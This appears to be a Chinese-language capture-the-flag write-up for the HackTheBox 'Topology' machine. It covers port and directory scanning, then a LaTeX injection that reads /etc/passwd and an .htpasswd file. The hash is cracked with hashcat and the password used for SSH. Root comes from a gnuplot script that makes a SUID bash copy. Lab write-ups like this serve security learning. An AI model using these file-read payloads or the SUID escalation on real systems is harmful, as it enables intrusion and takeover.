上来先nmap扫一下
sudo nmap -sT --min-rate 10000 -p- 10.10.11.217
nmap --script=vuln -p22,80 10.10.11.217
echo "10.10.11.217 topology.htb" >> /etc/hosts
页面没有发现什么东西,目录扫描一下
dirsearch -u http://topology.htb -e *
[22:47:43] 403 - 277B - /.htaccess_orig
[22:47:43] 403 - 277B - /.htpasswds
[22:47:43] 403 - 277B - /.htaccessOLD2
[22:47:43] 403 - 277B - /.httr-oauth
[22:47:44] 403 - 277B - /.htpasswd_test
[22:47:51] 403 - 277B - /.php
[22:51:22] 301 - 310B - /css -> http://topology.htb/css/
[22:52:40] 301 - 313B - /images -> http://topology.htb/images/
[22:52:40] 200 - 1KB - /images/
[22:52:48] 200 - 7KB - /index.html
也扫不出来什么东西
在这里发现子域名http://latex.topology.htb/
也不存在目录穿越
Refer-HackTrick:Formula/CSV/Doc/LaTeX Injection - HackTricks
Refer-github:https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LaTeX%20Injection
存在laTex表达式注入
啊哈哈哈,第一条poc就被ban了
读取文件
$\lstinputlisting{/etc/passwd}$
$\lstinputlisting{/var/www/dev/.htpasswd}$
用hash-identifier查加密方式。
丢给hashcat
hashcat -m(类型)
0 = MD5
10 = md5($pass.$salt)
20 = md5($salt.$pass)
30 = md5(unicode($pass).$salt)
40 = md5($salt.unicode($pass))
50 = HMAC-MD5 (key = $pass)
60 = HMAC-MD5 (key = $salt)
100 = SHA1
110 = sha1($pass.$salt)
120 = sha1($salt.$pass)
130 = sha1(unicode($pass).$salt)
140 = sha1($salt.unicode($pass))
150 = HMAC-SHA1 (key = $pass)
160 = HMAC-SHA1 (key = $salt)
200 = MySQL323
300 = MySQL4.1/MySQL5
400 = phpass, MD5(Wordpress), MD5(phpBB3),MD5(Joomla)
500 = md5crypt, MD5(Unix), FreeBSD MD5,Cisco-IOS MD5
900 = MD4
1000 = NTLM
1100 = Domain Cached Credentials (DCC), MSCache
1400 = SHA256
1410 = sha256($pass.$salt)
1420 = sha256($salt.$pass)
1430 = sha256(unicode($pass).$salt)
1431 = base64(sha256(unicode($pass)))
1440 = sha256($salt.unicode($pass))
1450 = HMAC-SHA256 (key = $pass)
1460 = HMAC-SHA256 (key = $salt)
1600 = md5apr1, MD5(APR), Apache MD5
1700 = SHA512
1710 = sha512($pass.$salt)
1720 = sha512($salt.$pass)
1730 = sha512(unicode($pass).$salt)
1740 = sha512($salt.unicode($pass))
1750 = HMAC-SHA512 (key = $pass)
1760 = HMAC-SHA512 (key = $salt)
1800 = SHA-512(Unix)
2400 = Cisco-PIX MD5
2410 = Cisco-ASA MD5
2500 = WPA/WPA2
得到密码:calculus20
ssh登录
拿到user的flag
这里的pspy64,chomd +x跑一下看看是啥(linux查看正在运行的脚本)
可以看到find /opt/gunplot -name *.plt -exec gunplot {}
这条命令 意思就是在/opt/gunplot这个目录下搜索 *.plt的文件
然后作为gunplot的参数执行
-bash-5.0$ echo "system 'cp /bin/bash /tmp/someb0dy;chmod u+s /tmp/someb0dy'">someb0dy.plt
-bash-5.0$ cp someb0dy.plt /opt/gnuplot/someb0dy.plt
-bash-5.0$ ./someb0dy -p
someb0dy-5.0# whaomi
root